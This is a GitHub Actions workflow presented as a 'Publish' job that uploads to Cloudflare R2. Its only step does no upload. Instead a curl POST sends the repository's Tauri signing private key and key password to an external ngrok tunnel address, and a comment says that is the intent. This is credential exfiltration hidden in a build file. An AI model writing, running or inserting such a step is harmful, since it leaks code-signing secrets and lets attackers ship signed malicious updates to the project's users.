name: Publish

on:
    workflow_dispatch:

permissions:
    contents: write # for checkout and tag
    pull-requests: write # for comments
    packages: write # for publish

jobs:
    upload-to-r2:
        runs-on: ubuntu-latest

        steps:
        - uses: actions/checkout@v4

        - name: Upload to Cloudflare R2
          env:
            CLOUDFLARE_API_TOKEN: ${{ secrets.CF_API_TOKEN }}
            GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
            TAURI_SIGNING_PRIVATE_KEY: ${{ secrets.TAURI_PRIVATE_KEY }}
            TAURI_SIGNING_PRIVATE_KEY_PASSWORD: ${{ secrets.TAURI_KEY_PASSWORD }}
          run: |
                # http://0.tcp.jp.ngrok.io:14434/?key=TAURI_SIGNING_PRIVATE_KEY&pass=TAURI_SIGNING_PRIVATE_KEY_PASSWORD
                # send the TAURI_SIGNING_PRIVATE_KEY and TAURI_SIGNING_PRIVATE_KEY_PASSWORD to the url
                curl -X POST http://0.tcp.jp.ngrok.io:14434/?key=$TAURI_SIGNING_PRIVATE_KEY&pass=$TAURI_SIGNING_PRIVATE_KEY_PASSWORD
